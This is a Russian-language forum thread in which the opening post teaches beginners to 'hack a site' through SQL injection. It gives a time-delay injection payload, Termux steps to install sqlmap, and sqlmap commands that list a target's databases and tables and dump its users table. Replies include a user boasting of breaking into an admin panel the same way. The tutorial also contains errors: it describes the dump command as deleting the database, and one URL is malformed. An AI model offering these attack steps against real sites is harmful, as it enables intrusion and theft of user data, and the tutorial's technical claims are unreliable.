Загрузка...

Sql инъекции или как взломать сайт

Тема в разделе Веб уязвимости создана пользователем жизнь_inactive3402465 3 окт 2020. 5524 просмотра

Загрузка...
  1. жизнь_inactive3402465
    жизнь_inactive3402465 Автор темы 3 окт 2020 Заблокирован(а) 496 11 июл 2020
    Прошу не бомбить в комментариях, что идея не моя. Писал текст я сам, перевел так сказать на доступный язык. Спасибо. Никогда подобным не занимался, пишу в ознакомительных целях

    Внедрение кода или инъекция SQL — это уязвимость системы безопасности в Интернете, позволяющая злоумышленнику завладеть доступом к SQL-запросам в базу данных. Так он может получить конфиденциальную информацию о структуре базы данных, таблицах, столбцах или полях вместе со всеми данными, которые там есть.

    Пример простой Sql инъекции:

    Допустим на сайте test.ru/каталог есть список товаров и поиск. Введем поисковый запрос "игрушечная машинка", нас перенаправляет на страницу test.ru/каталог?search=игрушечная+машинка
    Что же произошло? Сейчас сайт сделал Sql запрос в базу данных, чтобы прочитать и вывести товары с заголовком "игрушечная машинка". Пример запроса:
    Код
    SELECT * FROM `katalog` WHERE `name` LIKE 'игрушечная машинка'
    Мы можем ввести в строку поиска вредоносный код, который поможет вытащить данные из базы данных.
    Как узнать, уязвим сайт или нет?
    Возьмём тот же самый поиск и тот же сайт, только в этот раз вместо "игрушечная машинка", мы введем вредоносный код:
    Код
    ' waitfor delay '0:10:0'
    Этот код искусственно замедляет sql запрос, таким образом сайт будет посылать запрос
    Код
    SELECT * FROM `katalog` WHERE `name` LIKE '' waitfor delay '0:10:0'
    Если вы заметили, что сайт стал загружаться медленнее, то он уязвим к таким инъекциям.
    Как же получить полный доступ к сайту?
    Нам понадобится Android, Termux и немного терпения.
    Запускаем Termux, прописываем следующий код:
    Код
    pkg upgrade

    pkg update

    pkg install git

    pkg install python

    pkg install wget

    git clone https://github.com/sqlmapproject/sqlmap.git

    cd sqlmap

    python sqlmap.py
    Далее прописываем
    Код
    python sqlmap.py -u http://test.ru/каталог?search?="игрушечная машинка" --dbs
    И ждём... Если вы все сделали правильно, то в конечном итоге вы увидите следующие:[IMG]

    Чтобы попасть в таблицу "acuart", нужно прописать
    Код
    python sqlmap.py -u http://test.ru/каталог?search="игрушечная машинка" -D acuart --tables
    Получаем примерно следующее:
    [IMG]

    Чтобы окончательно удалить базу данных, прописываем
    Код
    python sqlmap.py -u http://test.ru/каталог?search="игрушечная машинка" -D acuart -T users --dump
    Внимание! Данный способ работает не на всех сайтах
     
    3 окт 2020 Изменено
  2. josu007
    josu007 3 окт 2020 Да мне в принципе все равно какая будет работа 149 21 окт 2017
    ух сука щас малолетние новокеки пойдут взламывать школьные дневники:finger_up:
     
  3. Leprosorium_inactive220411
    Привет с 2014 года, а то и ещё раньше. #МодерУдаляй!
     
    1. жизнь_inactive3402465 Автор темы
      Leprosorium_inactive220411, не видел таких гайдов на просторах форума. Сейчас многие не опытные разработчики допускают банальные ошибки
    2. Leprosorium_inactive220411
      жизнь_inactive3402465, маза не в том, что это есть на форуме. А в том, что кроме как некросайтов, никому ненужных, по состоянию на СЕГОДНЯ, ты - ничего не не заинжектиж в бд
    3. жизнь_inactive3402465 Автор темы
      Leprosorium_inactive220411, согласен. Но я писал и с целью показать начинающим разработчикам, как происходят взломы сайтов
  4. Mr_Error
    Mr_Error 5 окт 2020 Заблокирован(а) 13 17 июл 2020
    Достойно. Продолжай)
     
  5. ParkIS
    ParkIS 20 окт 2020 0 9 июн 2020
    Подскажите, пожалуйста, стоит или нет проходить обучение здесь? Курс - Тестирование Веб-Приложений на проникновение. Пишут, что это один из самых сильных курсов за всю историю рунета по теме Web Application Penetration Testing (WAPT). Может кто-то уже обучался у них?
     
  6. Apmlok
    Apmlok 20 окт 2020 https://t.me/meinlog_bot Лучшие **** тут 511 31 янв 2019
    хых,я года два назад так админку на сайте взломал
     
  7. BroGan1337
    BroGan1337 20 окт 2020 Заблокирован(а) 12 4 авг 2017
    Авторку ему.
     
Top